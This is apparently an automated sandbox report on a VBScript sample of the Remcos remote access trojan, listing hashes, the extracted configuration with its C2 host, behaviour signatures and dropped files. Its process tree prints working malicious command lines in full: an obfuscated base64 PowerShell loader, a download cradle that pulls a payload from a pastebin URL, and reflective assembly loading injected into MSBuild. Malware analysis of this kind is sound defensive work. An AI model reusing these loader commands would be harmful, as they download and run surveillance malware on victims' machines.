Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/11/2024, 21:34

General

  • Target

    target.vbs

  • Size

    6KB

  • MD5

    2dffd2a836e52c50a0c917e46a5868a1

  • SHA1

    af5fa54fbd090e1aae6502b5fa0ab00e3f4acd24

  • SHA256

    83b9bc8d2f4ef6a85965de118a374157d1054dbfb5a1f57bdaafafaa3ec07f11

  • SHA512

    e924755e2592980980d8431a63487dc650775f6b1296abf861d81beb70b01d82b83331cc9ce6c79cf8832db54ac2a4d20d4e2b510f9103e13115a8c8e58aacaa

  • SSDEEP

    96:eqUcAePyt8dA+AkDvgsZqW7bBFhfH7HK0c3Dm7aGnGcdUd66VX7txI7ezF:99PZzDbN7bJvD1czm7lG0UdvjRzF

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://pastebin.com/raw/J6uRjZrv

Extracted

Family

remcos

Botnet

Nt

C2

sremc.duckdns.org:2404

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-29CPLV

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1540
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT☹Hk☹cwB0☹GU☹bQ☹u☹E4☹ZQB0☹C4☹UwBl☹HI☹dgBp☹GM☹ZQBQ☹G8☹aQBu☹HQ☹TQBh☹G4☹YQBn☹GU☹cgBd☹Do☹OgBT☹GU☹YwB1☹HI☹aQB0☹Hk☹U☹By☹G8☹d☹Bv☹GM☹bwBs☹C☹☹PQ☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBO☹GU☹d☹☹u☹FM☹ZQBj☹HU☹cgBp☹HQ☹eQBQ☹HI☹bwB0☹G8☹YwBv☹Gw☹V☹B5☹H☹☹ZQBd☹Do☹OgBU☹Gw☹cw☹x☹DI☹Ow☹k☹EM☹QwBS☹Gg☹bQ☹g☹D0☹I☹☹n☹Gg☹d☹B0☹H☹☹cw☹6☹C8☹LwBw☹GE☹cwB0☹GU☹YgBp☹G4☹LgBj☹G8☹bQ☹v☹HI☹YQB3☹C8☹Sg☹2☹HU☹UgBq☹Fo☹cgB2☹Cc☹I☹☹7☹CQ☹Zg☹g☹D0☹I☹☹o☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBJ☹E8☹LgBQ☹GE☹d☹Bo☹F0☹Og☹6☹Ec☹ZQB0☹FQ☹ZQBt☹H☹☹U☹Bh☹HQ☹a☹☹o☹Ck☹I☹☹r☹C☹☹JwBk☹Gw☹b☹☹w☹DE☹LgB0☹Hg☹d☹☹n☹Ck☹I☹☹7☹Ek☹bgB2☹G8☹awBl☹C0☹VwBl☹GI☹UgBl☹HE☹dQBl☹HM☹d☹☹g☹C0☹VQBS☹Ek☹I☹☹k☹EM☹QwBS☹Gg☹bQ☹g☹C0☹TwB1☹HQ☹RgBp☹Gw☹ZQ☹g☹CQ☹Zg☹g☹C0☹VQBz☹GU☹QgBh☹HM☹aQBj☹F☹☹YQBy☹HM☹aQBu☹Gc☹I☹☹7☹GM☹bQBk☹C4☹ZQB4☹GU☹I☹☹v☹GM☹I☹☹7☹H☹☹aQBu☹Gc☹I☹☹x☹DI☹Nw☹u☹D☹☹Lg☹w☹C4☹MQ☹g☹Ds☹c☹Bv☹Hc☹ZQBy☹HM☹a☹Bl☹Gw☹b☹☹u☹GU☹e☹Bl☹C☹☹LQBj☹G8☹bQBt☹GE☹bgBk☹C☹☹ew☹k☹GY☹I☹☹9☹C☹☹K☹Bb☹FM☹eQBz☹HQ☹ZQBt☹C4☹SQBP☹C4☹U☹Bh☹HQ☹a☹Bd☹Do☹OgBH☹GU☹d☹BU☹GU☹bQBw☹F☹☹YQB0☹Gg☹K☹☹p☹C☹☹Kw☹g☹Cc☹Z☹Bs☹Gw☹M☹☹x☹C4☹d☹B4☹HQ☹Jw☹p☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹SQBu☹HY☹bwBr☹GU☹LQBX☹GU☹YgBS☹GU☹cQB1☹GU☹cwB0☹C☹☹LQBV☹FI☹SQ☹g☹CQ☹UQBQ☹HQ☹YQB2☹C☹☹LQBP☹HU☹d☹BG☹Gk☹b☹Bl☹C☹☹J☹Bm☹C☹☹LQBV☹HM☹ZQBC☹GE☹cwBp☹GM☹U☹Bh☹HI☹cwBp☹G4☹ZwB9☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹J☹Bs☹HU☹bwBy☹H☹☹I☹☹9☹C☹☹Jw☹w☹Cc☹I☹☹7☹CQ☹e☹Bt☹HY☹bgBq☹C☹☹PQ☹g☹Cc☹JQBK☹Gs☹UQBh☹HM☹R☹Bm☹Gc☹cgBU☹Gc☹JQ☹n☹C☹☹OwBb☹EI☹eQB0☹GU☹WwBd☹F0☹I☹☹k☹Gc☹aQBr☹Hc☹eQ☹g☹D0☹I☹Bb☹HM☹eQBz☹HQ☹ZQBt☹C4☹QwBv☹G4☹dgBl☹HI☹d☹Bd☹Do☹OgBG☹HI☹bwBt☹EI☹YQBz☹GU☹Ng☹0☹FM☹d☹By☹Gk☹bgBn☹Cg☹I☹☹k☹FE☹U☹B0☹GE☹dg☹u☹HI☹ZQBw☹Gw☹YQBj☹GU☹K☹☹n☹CQ☹J☹☹n☹Cw☹JwBB☹Cc☹KQ☹g☹Ck☹I☹☹7☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBB☹H☹☹c☹BE☹G8☹bQBh☹Gk☹bgBd☹Do☹OgBD☹HU☹cgBy☹GU☹bgB0☹EQ☹bwBt☹GE☹aQBu☹C4☹T☹Bv☹GE☹Z☹☹o☹CQ☹ZwBp☹Gs☹dwB5☹Ck☹LgBH☹GU☹d☹BU☹Hk☹c☹Bl☹Cg☹JwBU☹GU☹a☹B1☹Gw☹YwBo☹GU☹cwBY☹Hg☹W☹B4☹Hg☹LgBD☹Gw☹YQBz☹HM☹MQ☹n☹Ck☹LgBH☹GU☹d☹BN☹GU☹d☹Bo☹G8☹Z☹☹o☹Cc☹TQBz☹HE☹QgBJ☹GI☹WQ☹n☹Ck☹LgBJ☹G4☹dgBv☹Gs☹ZQ☹o☹CQ☹bgB1☹Gw☹b☹☹s☹C☹☹WwBv☹GI☹agBl☹GM☹d☹Bb☹F0☹XQ☹g☹Cg☹Jw☹w☹C8☹VgB0☹HU☹d☹BQ☹C8☹Z☹☹v☹GU☹ZQ☹u☹GU☹d☹Bz☹GE☹c☹☹v☹C8☹OgBz☹H☹☹d☹B0☹Gg☹Jw☹g☹Cw☹I☹☹k☹Hg☹bQB2☹G4☹ag☹g☹Cw☹I☹☹n☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹Xw☹t☹C0☹LQ☹t☹C0☹LQ☹t☹Cc☹L☹☹g☹CQ☹b☹B1☹G8☹cgBw☹Cw☹I☹☹n☹DE☹Jw☹s☹C☹☹JwBS☹G8☹Z☹Bh☹Cc☹I☹☹p☹Ck☹Ow☹=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('☹','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\target.vbs');powershell $Yolopolhggobek;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2704
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$luorp = '0' ;$xmvnj = 'C:\Users\Admin\AppData\Local\Temp\target.vbs' ;[Byte[]] $gikwy = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gikwy).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/VtutP/d/ee.etsap//:sptth' , $xmvnj , '____________________________________________-------', $luorp, '1', 'Roda' ));"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4016
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c
          4⤵
            PID:5068
          • C:\Windows\system32\PING.EXE
            "C:\Windows\system32\PING.EXE" 127.0.0.1
            4⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:4708
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2180
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            4⤵
              PID:2664
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:5044

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\ProgramData\remcos\logs.dat

              Filesize

              144B

              MD5

              8fea7e437f05257eee06bd40b113fdf8

              SHA1

              62751708ee1783878cd7c73513974d92d3a61025

              SHA256

              e7c1ebb39309ea8e3b60f5bc433ce4c775e5d77046579d884be1632a55700369

              SHA512

              69ec5f704743de553d3a3a5db9613e2910e9de766e56ec1e9af2d32599ad94be69d139fe45980e94e0435ea031b13e1c06e1d515941e86a35128cf3c48b2a846

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

              Filesize

              3KB

              MD5

              223bd4ae02766ddc32e6145fd1a29301

              SHA1

              900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

              SHA256

              1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

              SHA512

              648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              5c9d2cbff87039dfa98390f51b06f61b

              SHA1

              736a64968f091a0fc9b987a45faf66f5f0bf6cd4

              SHA256

              b3ff6eac7e6d3f70f21d63f5a34e04322d71319e27bb433f4496663337bf3251

              SHA512

              43831a52799e14bee975a825342ffb51003e12597b664e18918b690f5f8781ab92f7f63428ee29aad05a3c386af5604e0cd0ca8df228b676a9da047fed51a3dd

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              64B

              MD5

              5caad758326454b5788ec35315c4c304

              SHA1

              3aef8dba8042662a7fcf97e51047dc636b4d4724

              SHA256

              83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

              SHA512

              4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hpvvibnz.kuf.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Local\Temp\dll01.txt

              Filesize

              57B

              MD5

              1a215af591b42d73d0254846ebf5ef21

              SHA1

              3a8f8d81abcf9c65a62c1bc043e669a6894a0177

              SHA256

              cdd976e886d1c89734decad2d084c76ee8fcd54a652195114478519af8bcdd18

              SHA512

              df7c33b6bc1953f9c859793d707aec6f2ee8dd03c7ad8e1437f448567961e254f0864cbc363528a30b994c6dff6e9a0d156290432053bb56d55e0da3b3b42ea3

            • C:\Users\Admin\AppData\Local\Temp\dll01.txt

              Filesize

              102KB

              MD5

              ed284d77b4400b2bcf8b0abbda2c8f90

              SHA1

              c9f8e86ac04eef36be0e46caf815d33afa743756

              SHA256

              c9b5f3f368d8497c092c270328f5ffc136121415190062b5a449ce4ecaec4ecd

              SHA512

              459808753f7a6f2bdbe145c56ba1f0fa1e7e92afc6fc4b94c3a7c9627598347f73c6e38aeb7ecac2d298ba78e0cdab9792a47ce9d9f36e1b975b857f1a421437

            • memory/2704-34-0x00007FFD36350000-0x00007FFD36E11000-memory.dmp

              Filesize

              10.8MB

            • memory/2704-0-0x00007FFD36353000-0x00007FFD36355000-memory.dmp

              Filesize

              8KB

            • memory/2704-33-0x00007FFD36353000-0x00007FFD36355000-memory.dmp

              Filesize

              8KB

            • memory/2704-12-0x00007FFD36350000-0x00007FFD36E11000-memory.dmp

              Filesize

              10.8MB

            • memory/2704-11-0x00007FFD36350000-0x00007FFD36E11000-memory.dmp

              Filesize

              10.8MB

            • memory/2704-52-0x00007FFD36350000-0x00007FFD36E11000-memory.dmp

              Filesize

              10.8MB

            • memory/2704-1-0x000002B36EE70000-0x000002B36EE92000-memory.dmp

              Filesize

              136KB

            • memory/4016-39-0x0000022102500000-0x0000022102516000-memory.dmp

              Filesize

              88KB

            • memory/4016-40-0x00000221027D0000-0x00000221027E6000-memory.dmp

              Filesize

              88KB

            • memory/5044-48-0x0000000000400000-0x000000000047F000-memory.dmp

              Filesize

              508KB

            • memory/5044-51-0x0000000000400000-0x000000000047F000-memory.dmp

              Filesize

              508KB

            • memory/5044-45-0x0000000000400000-0x000000000047F000-memory.dmp

              Filesize

              508KB

            • memory/5044-53-0x0000000000400000-0x000000000047F000-memory.dmp

              Filesize

              508KB

            • memory/5044-55-0x0000000000400000-0x000000000047F000-memory.dmp

              Filesize

              508KB

            • memory/5044-54-0x0000000000400000-0x000000000047F000-memory.dmp

              Filesize

              508KB

            • memory/5044-56-0x0000000000400000-0x000000000047F000-memory.dmp

              Filesize

              508KB

            • memory/5044-63-0x0000000000400000-0x000000000047F000-memory.dmp

              Filesize

              508KB

            • memory/5044-64-0x0000000000400000-0x000000000047F000-memory.dmp

              Filesize

              508KB

            • memory/5044-41-0x0000000000400000-0x000000000047F000-memory.dmp

              Filesize

              508KB

            • memory/5044-71-0x0000000000400000-0x000000000047F000-memory.dmp

              Filesize

              508KB

            • memory/5044-72-0x0000000000400000-0x000000000047F000-memory.dmp

              Filesize

              508KB

            • memory/5044-79-0x0000000000400000-0x000000000047F000-memory.dmp

              Filesize

              508KB

            • memory/5044-80-0x0000000000400000-0x000000000047F000-memory.dmp

              Filesize

              508KB

            • memory/5044-88-0x0000000000400000-0x000000000047F000-memory.dmp

              Filesize

              508KB

            • memory/5044-87-0x0000000000400000-0x000000000047F000-memory.dmp

              Filesize

              508KB